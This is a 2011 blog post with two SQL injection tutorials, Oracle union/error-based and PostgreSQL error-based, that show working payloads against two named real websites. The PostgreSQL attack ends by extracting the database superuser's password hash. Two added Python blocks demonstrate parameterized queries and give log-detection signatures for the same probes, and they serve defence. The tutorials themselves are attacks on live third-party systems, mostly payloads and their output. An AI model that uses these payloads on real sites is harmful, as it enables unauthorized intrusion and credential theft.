Monday, May 30, 2011

Oracle Database Injection


So we are going to play with Oracle Database Injection.
Our target:
http://www3.inn.cl
First, using union-based injection.

1 - We start by checking for the vulnerability by adding a single quote '
Code:
http://www3.inn.cl/noticias/index.php?id=2372'
If it is vulnerable, it will produce an error:
Quote:
Warning: ociparse(): OCIParse: ORA-01756: quoted string not properly terminated in /home/www/html/inn/noticias/_index.php on line 5
We can see ORA-01756, and immediately know this is Oracle injection, right?


2 - We find the number of columns as usual: order by 1-- and so on until an error appears.
On this site, the number of columns = 9
3 - So we continue with our union injection
Code:
http://www3.inn.cl/noticias/index.php?id=2372 UNION SELECT 1,2,3,4,5,6,7,8,9
If no column number shows up here, we look at the error it gives.
Quote:
Warning: ociexecute(): OCIStmtExecute: ORA-00923: FROM keyword not found where expected in /home/www/html/inn/noticias/_index.php on line 6

FROM keyword not found means this injection needs a FROM clause.
For reference:
Code:
http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/

Before that, we need to set all the column numbers to null first, the same as in PostgreSQL injection.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,null,null,null,null,null,null,null,null--

To make it easier to find out which column can be injected, change null to 0 one column at a time.
In this case, putting 0 in the first null column gave no error, but an error appeared when it was in the 2nd column.
This means the second column is the one we can inject.


4 - In this tutorial we only inject and extract up to version(); the rest you can test yourselves.
From pentestmonkey, we see there are 3 syntaxes to check the version
Quote:
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;


So we just take the 1st one for testing.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,banner,null,null,null,null,null,null,null FROM v$version WHERE banner LIKE 'Oracle%'--
Quote:
Oracle Database 10g Release 10.2.0.1.0 - 64bit Production




So.. it succeeded...
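The walkthrough above works because the id parameter is pasted straight into the SQL text and the raw OCI error is echoed back to the browser. The following is an added example (not code from the original post or from the site being tested) showing that pattern beside its fixed form: the id is validated as an integer before any query runs, it is passed as a bind parameter rather than concatenated, and database errors are never returned to the client. It uses an in-memory sqlite3 database with constructed tables (noticias, secret) as a stand-in for Oracle so it runs offline; the sqlite3 ? placeholder plays the role of an OCI bind variable (oci_bind_by_name in PHP).

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in schema; sqlite3 replaces Oracle only so this runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE noticias (id INTEGER PRIMARY KEY, titulo TEXT)")
    conn.executemany("INSERT INTO noticias VALUES (?, ?)",
                     [(2372, "Noticia A"), (2373, "Noticia B")])
    # A second table the article page should never be able to read from.
    conn.execute("CREATE TABLE secret (banner TEXT)")
    conn.execute("INSERT INTO secret VALUES ('Oracle Database 10g (constructed)')")
    return conn


def vulnerable_lookup(conn, raw_id):
    """The pattern behind ORA-01756 / UNION behaviour: input concatenated into SQL,
    and the verbose database error handed straight back to the client."""
    sql = "SELECT titulo FROM noticias WHERE id=" + raw_id
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return "DB error: " + str(exc)  # this is the leak error-based extraction feeds on


class BadRequest(Exception):
    pass


ID_RE = re.compile(r"[0-9]{1,10}")  # the id is a positive integer, nothing else


def parse_id(raw_id):
    """Reject anything that is not a plain integer before the database sees it."""
    if not ID_RE.fullmatch(raw_id):
        raise BadRequest("id must be an integer")
    return int(raw_id)


def hardened_lookup(conn, raw_id):
    """Validate, bind, and swallow database errors (log them server-side instead)."""
    try:
        article_id = parse_id(raw_id)
    except BadRequest:
        return None  # 400 to the client; no SQL executed
    try:
        rows = conn.execute("SELECT titulo FROM noticias WHERE id=?",
                            (article_id,)).fetchall()
    except sqlite3.Error:
        return None  # generic 500; the ORA-/sqlite text stays in the server log
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    for probe in ("2372", "2372'", "-2372 UNION SELECT banner FROM secret"):
        print(repr(probe), "->", vulnerable_lookup(db, probe), "|", hardened_lookup(db, probe))
```

With the concatenated query the union probe returns the contents of the other table and the quote probe returns the parser error text; with the hardened version both probes are rejected before any SQL runs and only a genuine integer id returns a row.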
----------------------------------------------------------------------------------------------------------
For error-based, we usually use or 1=1 / or 1=2
1 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
The utl_inaddr.get_host_address function can only be used if the Oracle version is 10g or lower; for 11g we need to use

Code:
1=ctxsys.drithsx.sn(1,(sql syntax))


Code:
http://www3.inn.cl/noticias/index.php?id=2372 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
Quote:
Warning: ociexecute(): OCIStmtExecute: ORA-29257: host Oracle Database 10g Release 10.2.0.1.0 - 64bit Production unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 in /home/www/html/inn/noticias/_index.php on line 6


Credit to : p0pc0rn @tbd.my 


Error Based PostgreSQL Injection

This is a demo of how to attack a website with error-based PostgreSQL injection. As an example, I take one from my 0day web apps that was just published.


Our victim is
http://www.creatop.com.cn
Try putting ' at the end of the URL.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80'
The output:
Code:
ERROR: syntax error at or near "''"

When I try to use
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=1
it returns the TRUE page, while when I use
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=0
the FALSE page is returned.

So I know this is either blind SQL injection or error-based SQL injection.
I try the error-based method.

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)
Oh, lucky!! It works! PostgreSQL!

So we proceed to get the table name.
Just like injecting other vulnerable websites, PostgreSQL is quite similar. In PostgreSQL error-based injection, every SQL query must be in this form:
Code:
cast((your sql command/query) as int)
So, to get the table name we use cast((select table_name from information_schema.tables limit 1 offset 0) as int). What do we get?
Code:
ERROR: invalid input syntax for integer: "pg_type"
One of the table_names is pg_type.
We check the other table_names by increasing the offset number.
That way I know there are pg_user and pg_shadow tables. I try to get the data from pg_shadow:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)
Code:
ERROR: invalid input syntax for integer: "postgres"
The usename is postgres.
How about the passwd?
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select passwd from pg_shadow limit 1 offset 0) as int)
Code:
ERROR: invalid input syntax for integer: "md5caa5a31e69edef35ea15e2db062836a7"

There you are.. we already have the passwd hash!
Then you can proceed however you want.
I will stop here; the rest you need to explore yourself.
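Both tutorials on this page leave the same two traces on the server side: a recognisable sequence of probe requests (a stray quote, order by counting, union with null padding, utl_inaddr / ctxsys.drithsx.sn calls, cast(... as int)), and an application that echoes raw database errors (ORA-xxxxx, "invalid input syntax for integer") back to the client. The block below is an added example, not part of the original post, of detection logic a defender can run over web-server access logs and application error logs to spot both. The log lines are constructed for the example (addresses from the documentation ranges, payloads modelled on the requests shown above); the signature names and the combined-log regex are my own choices.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the probe techniques walked through above
# (Oracle union/error-based and PostgreSQL cast-as-int).
REQUEST_SIGNATURES = {
    "quote-probe": re.compile(r"[?&]\w+=\d+'(?:&|$)"),
    "column-count": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "oracle-error-based": re.compile(r"utl_inaddr\.get_host_address|ctxsys\.drithsx\.sn", re.I),
    "postgres-cast-error": re.compile(r"\bcast\s*\(.*\bas\s+int\b", re.I),
    "catalog-access": re.compile(r"v\$version|v\$instance|pg_shadow|pg_user|information_schema\.", re.I),
}
# Application-side signatures: database errors reaching the client are the
# channel that error-based extraction depends on.
ERROR_SIGNATURES = {
    "oracle": re.compile(r"\bORA-\d{5}\b"),
    "postgres": re.compile(r"invalid input syntax for integer|syntax error at or near"),
}
# Apache/nginx combined-style access log line (constructed format for this example).
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) \S+$')


def classify_request(uri):
    """Return the sorted signature names that match a URL-encoded request URI."""
    decoded = unquote_plus(uri)
    return sorted(name for name, rx in REQUEST_SIGNATURES.items() if rx.search(decoded))


def scan_access_log(text):
    """One (ip, decoded uri, [signatures]) record per flagged access-log line."""
    flagged = []
    for line in text.splitlines():
        m = ACCESS_LINE.match(line)
        if not m:
            continue
        hits = classify_request(m.group("uri"))
        if hits:
            flagged.append((m.group("ip"), unquote_plus(m.group("uri")), hits))
    return flagged


def scan_error_log(text):
    """(family, first matching error token) for each line that carries a DB error."""
    leaks = []
    for line in text.splitlines():
        for family, rx in ERROR_SIGNATURES.items():
            m = rx.search(line)
            if m:
                leaks.append((family, m.group(0)))
                break
    return leaks


# Constructed sample access log: one client walking the Oracle steps, one the PostgreSQL step.
ACCESS_LOG = """\
203.0.113.5 - - [30/May/2011:10:01:02 +0800] "GET /noticias/index.php?id=2372 HTTP/1.1" 200 5120
203.0.113.5 - - [30/May/2011:10:01:09 +0800] "GET /noticias/index.php?id=2372' HTTP/1.1" 200 812
203.0.113.5 - - [30/May/2011:10:01:31 +0800] "GET /noticias/index.php?id=2372%20order%20by%2010-- HTTP/1.1" 200 790
203.0.113.5 - - [30/May/2011:10:02:05 +0800] "GET /noticias/index.php?id=-2372%20UNION%20SELECT%20null,banner,null%20FROM%20v$version-- HTTP/1.1" 200 5210
203.0.113.5 - - [30/May/2011:10:03:14 +0800] "GET /noticias/index.php?id=2372%20or%201=utl_inaddr.get_host_address((SELECT%20banner%20FROM%20v$version)) HTTP/1.1" 200 930
198.51.100.7 - - [30/May/2011:11:15:00 +0800] "GET /index.cfm?MenuID=80%20and%201=cast((select%20usename%20from%20pg_shadow%20limit%201)%20as%20int) HTTP/1.1" 200 640
198.51.100.9 - - [30/May/2011:11:20:00 +0800] "GET /index.cfm?MenuID=81 HTTP/1.1" 200 3300
"""

# Constructed sample application error log using the error texts quoted in the post.
APP_ERROR_LOG = """\
[Mon May 30 10:01:09 2011] [error] [client 203.0.113.5] PHP Warning:  ociparse(): OCIParse: ORA-01756: quoted string not properly terminated in /home/www/html/inn/noticias/_index.php on line 5
[Mon May 30 10:03:14 2011] [error] [client 203.0.113.5] PHP Warning:  ociexecute(): OCIStmtExecute: ORA-29257: host Oracle Database 10g Release 10.2.0.1.0 - 64bit Production unknown ORA-06512: at "SYS.UTL_INADDR", line 19
[Mon May 30 11:15:00 2011] [error] [client 198.51.100.7] ERROR: invalid input syntax for integer: "postgres"
[Mon May 30 11:20:00 2011] [notice] child pid 4411 exit signal
"""

if __name__ == "__main__":
    for ip, uri, hits in scan_access_log(ACCESS_LOG):
        print(ip, hits, uri)
    for family, token in scan_error_log(APP_ERROR_LOG):
        print("DB error reached the app layer:", family, token)
```

The request-side signatures catch the probing pattern regardless of whether it succeeded, so they are alert-worthy on their own; the error-log signatures are the more important finding for the application owner, because a database error that reaches the page (PHP display_errors, or a ColdFusion page printing the driver message) is exactly what turns a boolean blind condition into the one-request extraction shown above. The fix on that side is to log such errors server-side and return a generic error page.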

References
Code:
http://hackingexpose.blogspot.com/2009/04/postgresql-error-base-sql-injection.html
http://pentestmonkey.net/blog/postgres-sql-injection-cheat-sheet/

Credit to : p0pc0rn